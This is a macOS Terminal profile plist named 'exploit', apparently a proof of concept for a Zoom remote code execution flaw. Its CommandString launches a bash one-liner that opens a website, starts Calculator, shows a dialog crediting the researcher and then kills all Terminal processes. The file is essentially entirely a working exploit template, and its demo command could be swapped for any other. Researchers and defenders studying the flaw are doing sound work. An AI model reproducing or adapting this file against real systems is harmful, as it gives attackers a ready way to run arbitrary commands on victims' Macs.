<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>CommandString</key>
	<string>/bin/bash -c "open 'https://secuna.io' &amp; open -a '/System/Applications/Calculator.app' &amp; sleep 0.2 &amp; osascript -e 'display dialog &#92;"AJ Dumanhug - Zoom RCE PoC&#92;"' &amp; pkill Terminal &amp;"</string>
	<key>ProfileCurrentVersion</key>
	<real>2.0600000000000001</real>
	<key>RunCommandAsShell</key>
	<false/>
	<key>name</key>
	<string>exploit</string>
	<key>type</key>
	<string>Window Settings</string>
</dict>
</plist>
